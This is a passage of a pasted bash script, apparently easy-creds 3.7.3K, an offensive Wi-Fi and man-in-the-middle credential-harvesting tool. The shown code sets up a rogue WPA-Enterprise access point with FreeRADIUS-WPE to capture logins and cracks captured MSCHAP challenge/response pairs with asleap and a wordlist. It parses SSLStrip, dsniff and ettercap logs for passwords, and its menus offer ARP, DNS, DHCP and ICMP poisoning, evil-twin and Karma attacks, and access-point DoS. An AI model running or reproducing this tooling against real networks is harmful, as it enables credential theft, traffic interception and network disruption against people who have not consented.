  1357.         echo "auth_server_shared_secret=$radiussecret" >> /tmp/ec/ec-hostapd.conf
  1358.         echo "wpa=1" >> /tmp/ec/ec-hostapd.conf
  1359.         echo "hw_mode=g" >> /tmp/ec/ec-hostapd.conf
  1360.         echo "channel=$radchannel" >> /tmp/ec/ec-hostapd.conf
  1361.         echo "wpa_pairwise=TKIP CCMP" >> /tmp/ec/ec-hostapd.conf
  1362.         echo "wpa_key_mgmt=WPA-EAP" >> /tmp/ec/ec-hostapd.conf
  1363. }
  1364.  
  1365.  
  1366. f_freeradiusfinal(){
  1367.         echo -e "\n\e[1;33m[*] Launching the FreeRadius server...\e[0m\n"
  1368.         if [ ! -z $isxrunning ]; then
  1369.          xterm -geometry "$width"x$height-$x+$y -T "radiusd" -bg white -fg black -e radiusd -X -f &
  1370.          echo $! > /tmp/ec/freeradius.pid
  1371.          sleep 3
  1372.         else
  1373.          screen -dmS FreeRadius -t radiusd $pathtoradiusd/radiusd -X -f
  1374.          echo $! > /tmp/ec/freeradius.pid
  1375.         fi
  1376.  
  1377.         echo -e "\n\e[1;33m[*] Launching hostapd...\e[0m\n"
  1378.         sleep 3
  1379.  
  1380.         if [ ! -z $isxrunning ]; then
  1381.          y=$(($y+$yoffset))
  1382.          xterm -geometry "$width"x$height-$x+$y -T "hostapd" -bg black -fg white -e $pathtohostapd/hostapd /tmp/ec/ec-hostapd.conf &
  1383.          sleep 3
  1384.         else
  1385.          screen -S FreeRadius -t hostapd -X screen $pathtohostapd/hostapd /tmp/ec/ec-hostapd.conf
  1386.          echo $! > /tmp/ec/hostapd.pid
  1387.         fi
  1388.  
  1389.         if [ ! -e $freeradiuslog ]; then
  1390.          touch $findradiuslog/freeradius-server-wpe.log
  1391.          freeradiuslog=$findradiuslog/freeradius-server-wpe.log
  1392.         fi
  1393.  
  1394.         echo -e "\n\e[1;33m[*] Launching credential log file...\e[0m\n"
  1395.         sleep 3
  1396.  
  1397.         if [ ! -z $isxrunning ]; then
  1398.          y=$(($y+$yoffset))
  1399.          xterm -geometry "$width"x$height-$x+$y -T "credentials" -bg black -fg green -hold -l -lf $logfldr/freeradius-creds-$(date +%F-%H%M).txt -e tail -f $freeradiuslog &
  1400.          echo $! > /tmp/ec/tail.pid
  1401.          sleep 3
  1402.         else
  1403.          screen -S FreeRadius -t credentials -X screen tail -f $freeradiuslog/freeradius-server-wpe.log
  1404.          screen -S easy-creds -X select 2
  1405.          screen -S easy-creds -X logfile $logfldr/freeradius-creds-$(date +%F-%H%M).txt
  1406.          screen -S easy-creds -X log
  1407.          echo $! > /tmp/ec/tail.pid
  1408.         fi
  1409.  
  1410.         tshark -i $radwiface -w $logfldr/freeradius-creds-$(date +%F-%H%M).dump &> /dev/null &
  1411.         echo $! > /tmp/ec/tshark.pid
  1412. }
  1413.  
  1414.  
  1415. ##################################################
  1416. #
  1417. # DATA REVIEW FUNCTIONS
  1418. #
  1419. ##################################################
  1420. f_SSLStrip(){
  1421.         clear
  1422.         f_Banner
  1423.  
  1424.         if [ -d $logfldr ]; then
  1425.           echo "SSLStrip logs in current log folder:"
  1426.           ls $logfldr/sslstrip* 2>/dev/null
  1427.           echo -e "\n\n"
  1428.         fi
  1429.  
  1430.         if [ -e /$PWD/strip-accts.txt ]; then rm /$PWD/strip-accts.txt; fi
  1431.  
  1432.         # Coded with help from 'Crusty Old Fart' - Ubuntu Forums
  1433.         LOGPATH=
  1434.         while [ -z $LOGPATH ] || [ ! -f "$LOGPATH" ]; do read -e -p "Enter the full path to your SSLStrip log file: " LOGPATH;  done
  1435.         DEFS=
  1436.         while [ -z $DEFS ] || [ ! -e "$DEFS" ]; do
  1437.                 read -e -p "Enter the full path to your definitions file [/pentest/sniffers/easy-creds/definitions.sslstrip]: " DEFS
  1438.                 if [ -z $DEFS ]; then DEFS="/pentest/sniffers/easy-creds/definitions.sslstrip"; fi
  1439.         done
  1440.  
  1441.         NUMLINES=$(cat "$DEFS" | wc -l)
  1442.         i=1
  1443.  
  1444.         while [ $i -le "$NUMLINES" ]; do
  1445.                 VAL1=$(awk -v k=$i 'FNR == k {print $1}' "$DEFS")
  1446.                 VAL2=$(awk -v k=$i 'FNR == k {print $2}' "$DEFS")
  1447.                 VAL3=$(awk -v k=$i 'FNR == k {print $3}' "$DEFS")
  1448.                 VAL4=$(awk -v k=$i 'FNR == k {print $4}' "$DEFS")
  1449.                 GREPSTR="$(grep -a $VAL2 "$LOGPATH" | grep -a $VAL3 | grep -a $VAL4)"
  1450.  
  1451.                 if [ "$GREPSTR" ]; then
  1452.                         echo -n "$VAL1" "- " >> /$PWD/strip-accts.txt
  1453.                         echo "$GREPSTR" | \
  1454.                         sed -e 's/.*'$VAL3'=/'$VAL3'=/' -e 's/&/ /' -e 's/&.*//' >> /$PWD/strip-accts.txt
  1455.                 fi
  1456.                 i=$[$i+1]
  1457.         done
  1458.  
  1459.         if [ -s /$PWD/strip-accts.txt ] && [ -z $isxrunning ]; then
  1460.          cat /$PWD/strip-accts.txt | less
  1461.         elif [ -s /$PWD/strip-accts.txt ] && [ ! -z $isxrunning ]; then
  1462.          xterm -geometry 80x24-0+0 -T "SSLStrip Accounts" -hold -bg white -fg black -e cat /$PWD/strip-accts.txt &
  1463.         else
  1464.          echo -e "\n\e[1;31m[-] Sorry no credentials captured...\e[0m"
  1465.         fi
  1466. }
  1467.  
  1468.  
  1469. #######################################################
  1470. f_dsniff(){
  1471.         clear
  1472.         f_Banner
  1473.  
  1474.         if [ -d $logfldr ]; then
  1475.           echo "Dsniff logs in current log folder:"
  1476.           ls $logfldr/ 2>/dev/null
  1477.           echo -e "\n\n"
  1478.         fi
  1479.  
  1480.         DSNIFFPATH=
  1481.         while [ -z $DSNIFFPATH ] || [ ! -f "$DSNIFFPATH" ]; do
  1482.          read -e -p "Enter the path for your dsniff Log file: " DSNIFFPATH
  1483.         done
  1484.  
  1485.         dsniff -r $DSNIFFPATH >> /$PWD/dsniff-log.txt
  1486.         if [ -z $isxrunning ];then
  1487.          cat /$PWD/dnsiff-log.txt | less
  1488.         else
  1489.          xterm -hold -bg blue -fg white -geometry 80x24-0+0 -T "Dsniff Accounts" -e cat /$PWD/dsniff-log.txt &
  1490.         fi
  1491. }
  1492.  
  1493.  
  1494. ##################################################
  1495. f_EtterLog(){
  1496.         clear
  1497.         f_Banner
  1498.  
  1499.         if [ -d $logfldr ]; then
  1500.           echo "Ettercap logs in current log folder:"
  1501.           ls $logfldr/*.eci 2>/dev/null
  1502.           echo -e "\n\n"
  1503.         fi
  1504.  
  1505.         ETTERECI=
  1506.         while [ -z $ETTERECI ] || [ ! -f "$ETTERECI" ]; do read -e -p "Enter the full path to your ettercap.eci log file: " ETTERECI; done
  1507.  
  1508.         etterlog -p "$ETTERECI" >> /$PWD/etterlog.txt
  1509.         if [ -z $isxrunning ]; then
  1510.          cat /$PWD/etterlog.txt | less
  1511.         else
  1512.          xterm -hold -bg blue -fg white -geometry 80x24-0+0 -T "Ettercap Accounts" -e cat /$PWD/etterlog.txt &
  1513.         fi
  1514. }
  1515.  
  1516. ##################################################
  1517. f_freeradiuscreds(){
  1518.  
  1519. while [ -z "$credlist" ] && [ ! -e "$credlist" ]; do
  1520.         echo -n -e "\nPlease enter the path to your FreeRadius Attack credential list"
  1521.         read -e -p ": " credlist
  1522. done
  1523.  
  1524. while [ -z "$wordlist" ] && [ ! -e "$wordlist" ]; do
  1525.         echo -n -e "\nPlease enter the path to your wordlist"
  1526.         read -e -p ": " wordlist
  1527. done
  1528.  
  1529.         echo -n -e "\n\e[1;33m[*] Please standby, this may take a while...\e[0m"
  1530.  
  1531. acreds="$PWD/asleap-creds-$(date +%F-%H%M).txt"
  1532. touch $acreds
  1533.  
  1534. cat $credlist|egrep 'username|challenge|response'| cut -d " " -f2 > /tmp/ec/freeradius-creds.tmp
  1535. NUMLINES=$(cat /tmp/ec/freeradius-creds.tmp | wc -l)
  1536. i=1
  1537.  
  1538. while [ $i -le "$NUMLINES" ]; do
  1539.         username=$(awk NR==$i /tmp/ec/freeradius-creds.tmp)
  1540.         i=$[$i+1]
  1541.         challenge=$(awk NR==$i /tmp/ec/freeradius-creds.tmp|tr -d '\r')
  1542.         i=$[$i+1]
  1543.         response=$(awk NR==$i /tmp/ec/freeradius-creds.tmp|tr -d '\r')
  1544.         i=$[$i+1]
  1545.         echo "Username: $username" >> "$acreds"
  1546.         $asleappath/asleap -C $challenge -R $response -W $wordlist | grep "password:"| sed -e 's/[\t ]//g;/^$/d'| sed -e 's/:/: /g' >> "$acreds"
  1547.         echo >> $acreds
  1548. done
  1549.  
  1550. echo -n -e "\n\e[1;33m[*] Your cracked credentials can be found at $acreds...\e[0m"
  1551. sleep 5
  1552. f_mainmenu
  1553. }
  1554.  
  1555. ##################################################
  1556. #
  1557. # MENU FUNCTIONS
  1558. #
  1559. ##################################################
  1560. f_Banner(){
  1561.         echo -e " ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ "
  1562.         echo -e "||\e[1;36me\e[0m |||\e[1;36ma\e[0m |||\e[1;36ms\e[0m |||\e[1;36my\e[0m |||\e[1;36m-\e[0m |||\e[1;36mc\e[0m |||\e[1;36mr\e[0m |||\e[1;36me\e[0m |||\e[1;36md\e[0m |||\e[1;36ms\e[0m ||"
  1563.         echo -e "||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||"
  1564.         echo -e "|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|"
  1565.         echo -e "\e[1;33m       Version 3.7.3K - KALI of Your Mind\e[0m"
  1566.         echo
  1567.         echo -e "\e[1;33mAt any time,\e[0m \e[1;36mctrl+c\e[0m \e[1;33m to cancel and return to the main menu\e[0m"
  1568.         echo
  1569. }
  1570.  
  1571.  
  1572. ##################################################
  1573. f_prereqs(){
  1574.         clear
  1575.         f_Banner
  1576.  
  1577.         echo "1.  Edit etter.conf"
  1578.         echo "2.  Edit etter.dns"
  1579.         echo "3.  Install dhcp3 server"
  1580.         echo "4.  Install karmetasploit prereqs"
  1581.         echo "5.  Add tunnel interface to dhcp3-server file"
  1582.         echo "6.  Update Metasploit Framework"
  1583.         echo "7.  Update Aircrack-ng"
  1584.         echo "8.  Update SSLStrip"
  1585.         echo "9.  How-to Videos (Launches Web Browser)"
  1586.         echo "10. Previous Menu"
  1587.         echo
  1588.         read -p "Choice: " prereqschoice
  1589.  
  1590.         case $prereqschoice in
  1591.         1) f_nanoetter ;;
  1592.         2) f_nanoetterdns ;;
  1593.         3) f_dhcp3install ;;
  1594.         4) f_karmareqs ;;
  1595.         5) f_addtunnel ;;
  1596.         6) f_msfupdate ;;
  1597.         7) f_aircrackupdate ;;
  1598.         8) f_sslstrip_vercheck ;;
  1599.         9) f_howtos ;;
  1600.         10) f_mainmenu ;;
  1601.         *) f_prereqs ;;
  1602.         esac
  1603. }
  1604.  
  1605.  
  1606. ##################################################
  1607. f_poisoning(){
  1608.         clear
  1609.         f_Banner
  1610.  
  1611.         echo "1.  Create Victim Host List"
  1612.         echo "2.  Standard ARP Poison"
  1613.         echo "3.  Oneway ARP Poison"
  1614.         echo "4.  DHCP Poison"
  1615.         echo "5.  DNS Poison"
  1616.         echo "6.  ICMP Poison"
  1617.         echo "7.  Previous Menu"
  1618.         echo
  1619.         read -p "Choice: " poisoningchoice
  1620.  
  1621.         case $poisoningchoice in
  1622.         1) f_HostScan ;;
  1623.         2) f_Standard ;;
  1624.         3) f_Oneway ;;
  1625.         4) f_DHCPPoison ;;
  1626.         5) f_DNSPoison ;;
  1627.         6) f_ICMP ;;
  1628.         7) f_mainmenu ;;
  1629.         *) f_poisoning ;;
  1630.         esac
  1631. }
  1632.  
  1633.  
  1634. ##################################################
  1635. f_fakeapattacks(){
  1636.         clear
  1637.         f_Banner
  1638.  
  1639.         echo "1.  FakeAP Attack Static"
  1640.         echo "2.  FakeAP Attack EvilTwin"
  1641.         echo "3.  Karmetasploit Attack"
  1642.         echo "4.  FreeRadius Attack"
  1643.         echo "5.  DoS AP Options"
  1644.         echo "6.  Previous Menu"
  1645.         echo
  1646.         read -p "Choice: " fapchoice
  1647.  
  1648.         case $fapchoice in
  1649.         1) f_fakeapAttack ;;
  1650.         2) f_fakeapeviltwin ;;
  1651.         3) f_KarmaAttack ;;
  1652.         4) f_freeradiusattack ;;
  1653.         5) f_DoSOptions ;;
  1654.         6) f_mainmenu ;;
  1655.         *) f_FakeAP-Menu ;;
  1656.         esac
  1657. }
  1658.  
  1659.  
  1660. ######################################################
  1661. f_DoSOptions(){
  1662.         clear
  1663.         f_Banner
  1664.  
  1665.         echo "1. Attack a Single or Multiple APs"
  1666.         echo "2. Last Man Standing (Use with Caution)"
  1667.         echo "3. Previous Menu"
  1668.         echo
  1669.         read -p "Choice: " doschoice
  1670.  
  1671.         case $doschoice in
  1672.         1) f_mdk3aps ;;
  1673.         2) f_lastman ;;
  1674.         3) f_fakeapattacks ;;
  1675.         *) f_DoSOptions ;;
  1676.         esac
  1677. }
  1678.  
  1679.  
  1680. ######################################################
  1681. f_DataReviewMenu(){
  1682.         clear
  1683.         f_Banner
  1684.  
  1685.         echo "1.  Parse SSLStrip log for credentials"
  1686.         echo "2.  Parse dsniff file for credentials"
  1687.         echo "3.  Parse ettercap eci file for credentials"
  1688.         echo "4.  Parse freeradius attack file for credentials"
  1689.         echo "5.  Previous Menu"
  1690.         echo
  1691.         read -p "Choice: " datareviewchoice
  1692.  
  1693.         case $datareviewchoice in
  1694.         1) f_SSLStrip ;;
  1695.         2) f_dsniff ;;
  1696.         3) f_EtterLog ;;
  1697.         4) f_freeradiuscreds ;;
  1698.         5) f_mainmenu ;;
  1699.         *) f_DataReviewMenu ;;
  1700.         esac
  1701. }
  1702.  
  1703.  
  1704. ##################################################
  1705. f_ICMP(){
  1706.         clear
  1707.         f_Banner
  1708.  
  1709.         echo "\n*** If you are connected to a switch this attack won't work! ***"
  1710.         echo -e "*** You must be able to see ALL traffic for this attack to work. ***\n\n"
  1711.         read -p "Are you connected to a switch [y/N]: " icmpswitch
  1712.  
  1713.         if [ $(echo $icmpswitch | tr 'A-Z' 'a-z') == "y" ]; then
  1714.                 f_ICMPPoison
  1715.         else
  1716.                 f_poisoning
  1717.         fi
  1718. }
  1719.  
  1720.  
  1721. ##################################################
  1722. f_mainmenu(){
  1723.         clear
  1724.         f_Banner
  1725.  
  1726.         echo "1.  Prerequisites & Configurations"
  1727.         echo "2.  Poisoning Attacks"
  1728.         echo "3.  FakeAP Attacks"
  1729.         echo "4.  Data Review"
  1730.         echo "5.  Exit"
  1731.         echo "q.  Quit current poisoning session"
  1732.         echo
  1733.         read -p "Choice: " mainchoice
  1734.  
  1735.         case $mainchoice in
  1736.         1) clean=; f_prereqs ;;
  1737.         2) clean=; f_poisoning ;;
  1738.         3) clean=; f_fakeapattacks ;;
  1739.         4) clean=; f_DataReviewMenu ;;
  1740.         5) f_checkexit ;;
  1741.         1968) f_pbs ;;
  1742.         Q|q) f_Quit ;;
  1743.         *) f_mainmenu ;;
  1744.         esac
  1745. }
  1746.  
  1747. # run as root
  1748. if [ "$(id -u)" != "0" ]; then
  1749.         echo -e "\e[1;31m[!] This script must be run as root\e[0m" 1>&2
  1750.         exit 1
  1751. else
  1752.         mkdir /tmp/ec
  1753.         f_isxrunning
  1754.         f_xtermwindows
  1755.         f_findpaths
  1756.         clean=1
  1757.         f_mainmenu
  1758. fi
clone this paste RAW Paste Data